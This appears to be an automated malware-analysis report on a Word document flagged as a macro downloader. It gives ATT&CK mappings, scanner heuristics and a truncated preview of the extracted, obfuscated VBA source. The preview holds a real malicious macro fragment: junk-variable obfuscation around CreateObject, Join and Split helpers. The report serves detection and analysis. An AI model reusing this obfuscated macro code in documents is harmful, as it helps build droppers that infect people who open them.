Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initiating malicious actions upon opening. Heuristics indicate the use of CreateObject, suggesting the execution of arbitrary code. The ClamAV detection name 'Doc.Downloader.Logan-9781905-0' strongly implies a downloader functionality, likely to fetch and execute a second-stage payload. The obfuscated nature of the VBA code further supports this assessment.
Heuristics (6)

- ClamAV: Doc.Downloader.Logan-9781905-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Logan-9781905-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18825 bytes |

SHA-256: da30aa94b28f995ffc9559eca817f363ffff3144f68117c4ed25ccf38eb07712

Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "A0qw88jfmftj"
Function A3j299fve06lt5(Ck5bsno1zt6awrt)
On Error Resume Next
Set ysTFeT = VhmwHC
Dim gDdmQGIOB(8 + 8 + 1 + 4) As String
gDdmQGIOB(QAplHkeJG) = (793 + 6)
XkaRA = iFHED
gDdmQGIOB(QAplHkeJG) = (eCYTAhBPC + 6475)
gDdmQGIOB(QAplHkeJG) = (5 + 99 + tNPPGEA)
Set GfnHk = sOKDC
Dim iVwUl(6 + 6 + 1 + 8) As String
iVwUl(ihDsFFSJA) = (8714 + 3010)
sAPoBA = nQjyzfCCc
iVwUl(ihDsFFSJA) = (RRcDYbID + 9392)
iVwUl(ihDsFFSJA) = (5 + 888 + UceADHfrB)
Set hxKakJ = tCAbIEd
Dim EQBZlAGFy(6 + 7 + 1 + 8) As String
EQBZlAGFy(goptn) = (9 + 6794)
YHxkhHBFp = nXJpG
EQBZlAGFy(goptn) = (yyNTWpBA + 4)
EQBZlAGFy(goptn) = (6 + 25 + DSSbGBIC)
A3j299fve06lt5 = Join(Ck5bsno1zt6awrt, Wbyxeyx9p0p)
Set wdRjjJQF = ssDwDNdK
Dim QrPpxWD(7 + 6 + 1 + 6) As String
QrPpxWD(TVmUC) = (37 + 46)
jMoTBT = QNmKFJJ
QrPpxWD(TVmUC) = (PApkUG + 906)
QrPpxWD(TVmUC) = (940 + 129 + rMmzJEG)
Set UnZuRinn = BaUIFI
Dim QCWGc(6 + 8 + 1 + 7) As String
QCWGc(HSADYuI) = (7 + 7)
KbIomNBFq = DmOJFCPSA
QCWGc(HSADYuI) = (AOYXO + 33)
QCWGc(HSADYuI) = (3 + 154 + FKGCJoAJ)
Set uxfmILHuB = XsUjBHJ
Dim CKTMEH(6 + 5 + 1 + 5) As String
CKTMEH(cJKjKAY) = (3587 + 8)
gFeBEEOHI = lVzkInJB
CKTMEH(cJKjKAY) = (WlrbJH + 361)
CKTMEH(cJKjKAY) = (95 + 887 + LxaeC)
End Function
Function Xxu9xp67tuoeumtl(Acdp6rpmgq6prk50)
On Error Resume Next
Set jIdgIA = gysoDFU
Dim JHRaBF(6 + 6 + 1 + 8) As String
JHRaBF(lQQGp) = (6 + 48)
dwdaOiH = aUIhAGSF
JHRaBF(lQQGp) = (KQAFIF + 5)
JHRaBF(lQQGp) = (63 + 8 + xaNQAOf)
Set bfOIkvC = VweUI
Dim KbDJH(8 + 6 + 1 + 5) As String
KbDJH(WyWjnXAPC) = (26 + 8)
pGnIE = tmmZR
KbDJH(WyWjnXAPC) = (gNtGlGD + 2)
KbDJH(WyWjnXAPC) = (3 + 768 + bwBXCnDF)
Set zFPoAU = QdqpGGY
Dim mUMutMmBE(8 + 5 + 1 + 4) As String
mUMutMmBE(MFIQc) = (3 + 506)
vSfDHJpAD = shHmTdByC
mUMutMmBE(MFIQc) = (RQSQY + 5258)
mUMutMmBE(MFIQc) = (7 + 326 + YAiiGGaIw)
Set Xxu9xp67tuoeumtl = CreateObject(Acdp6rpmgq6prk50)
Set PnJNGD = HuzlVT
Dim QSGkhYDl(6 + 5 + 1 + 7) As String
QSGkhYDl(xVlti) = (1457 + 103)
wloMAFbD = mlVcLJE
QSGkhYDl(xVlti) = (UdjVcDI + 579)
QSGkhYDl(xVlti) = (1806 + 8 + paCtQ)
Set UyQuCCIIk = XdnLHK
Dim WyoYoGAI(7 + 5 + 1 + 7) As String
WyoYoGAI(ucsIGp) = (8 + 7)
hYWDo = zBEQaB
WyoYoGAI(ucsIGp) = (uOovD + 4)
WyoYoGAI(ucsIGp) = (1 + 8 + rQraB)
Set mdLTHS = rdLckC
Dim WSIcIEFT(6 + 8 + 1 + 7) As String
WSIcIEFT(cVtEIGBJ) = (8 + 3713)
vgHgDxkCH = nwFVA
WSIcIEFT(cVtEIGBJ) = (mamvGHGZx + 763)
WSIcIEFT(cVtEIGBJ) = (4 + 1 + InoiHi)
End Function
Function Wb5ececqr26b(U0wuyrvvt463)
On Error Resume Next
Set xEREA = zNfVpACZJ
Dim QGBcEIC(8 + 7 + 1 + 6) As String
QGBcEIC(MCAFCHmQ) = (9271 + 1)
tFaCY = KFhkw
QGBcEIC(MCAFCHmQ) = (IKQxI + 749)
QGBcEIC(MCAFCHmQ) = (1 + 12 + ZeFrs)
Set JsJlu = DSVADGyC
Dim iSEPJ(7 + 6 + 1 + 8) As String
iSEPJ(rxlbDFfQ) = (7 + 4)
qiGkF = DdZSLBJJM
iSEPJ(rxlbDFfQ) = (yQGABD + 16)
iSEPJ(rxlbDFfQ) = (2150 + 4 + WITxQSC)
Set BsOmYj = ukzdIS
Dim SRFEIWGAI(8 + 8 + 1 + 8) As String
SRFEIWGAI(DXGEA) = (637 + 4)
JhpnAP = BTINH
SRFEIWGAI(DXGEA) = (oPGmPafn + 464)
SRFEIWGAI(DXGEA) = (65 + 6811 + GqKvAx)
Wb5ececqr26b = Split(U0wuyrvvt463, "=PO32")
Set RrkdIHC = FlXQCDFX
Dim IobhFeF(8 + 5 + 1 + 5) As String
IobhFeF(nSOBg) = (5 + 4)
RlWCBRHG = ieDsiDBC
IobhFeF(nSOBg) = (GOqlIF + 3)
IobhFeF(nSOBg) = (2 + 84 + ecQaEyEOR)
Set NeREBDFdt = aJllzA
Dim vOxAQOFBA(5 + 7 + 1 + 6) As String
vOxAQOFBA(xlegt) = (446 + 270)
JYAcBA = SFEcJG
vOxAQOFBA(xlegt) = (EMLUPRRBD + 1)
vOxAQOFBA(xlegt) = (6374 + 1 + IJKBzC)
Set zuzXGxInI = hyrBonVDg
Dim KWghkk(7 + 6 + 1 + 4) As String
KWghkk(mFYenuCr) = (680 + 4)
lvamaHBk = yvGTC
KWghkk(mFYenuCr) = (yryMyA + 9)
KWghkk(mFYenuCr) = (9 + 28 + JnbuiJI)
End Function
Attribute VB_Name = "Xfz7gu6iysst4bk"
Attribute VB_Base = "0{EBE7B244-872C-40E7-A6F5-10D638D9F413}{BAD28B56-127A-4DDF-AE1D-5CADEC5F02F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Fun
... (truncated)
```